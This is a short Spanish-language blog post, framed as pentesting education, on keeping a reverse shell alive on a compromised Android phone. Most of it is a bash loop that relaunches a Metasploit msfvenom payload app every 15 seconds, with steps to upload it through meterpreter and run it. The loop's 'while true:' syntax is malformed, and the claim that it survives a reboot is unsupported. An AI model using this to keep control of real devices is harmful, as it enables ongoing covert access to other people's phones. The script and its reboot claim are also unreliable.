Android - Persistencia en sistemas móviles (reverse shell).


DISCLAIMER: El contenido de este artículo tiene como propósito compartir información para fines educativos. No me hago responsable de cualquier acto ilícito realizado con la información siguiente. No vulneres sistemas ajenos a los tuyos. El conocimiento es libre.



Cuando se realiza un Pentest, una de las cosas que nos atañen es el mantener la persistencia en los sistemas vulnerados y mucho más si estos son móviles.

Es por ello que hoy veremos un pequeño script ".sh" que nos permitirá mantener conexión con el dispositivo remoto, y que exista una persistencia (reverse shell).




Una vez vulnerada una terminal de Android, lo único que queda es
correr un archivo en BASH que mande llamar de manera recursiva a
la aplicación maliciosa. Se toma como ejemplo una shell creada con msfvenom
 (de Metasploit).

 El script:
----------------------------------------------------------------------------------------------------------------
while true:
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 15
done
----------------------------------------------------------------------------------------------------------------


Hay que movernos con la shell interna del sistema vulnerado hasta la ruta:

    /data/data/com.metasploit.stage/files

Para luego proceder a subir la recursividad (comando upload desde meterpreter) y correrla con el comando:
   
    sh recur.sh

La recursividad funciona aún con el reinicio del sistema.

By: Krh3rtz

__Exploiting vulnerabilities, creating new ways through__


Comentarios

Entradas más populares de este blog

Crear pequeño cluster de servervidores en Virtualbox

Buffer Overflows POC - Análisis de Stack, su organización y explotación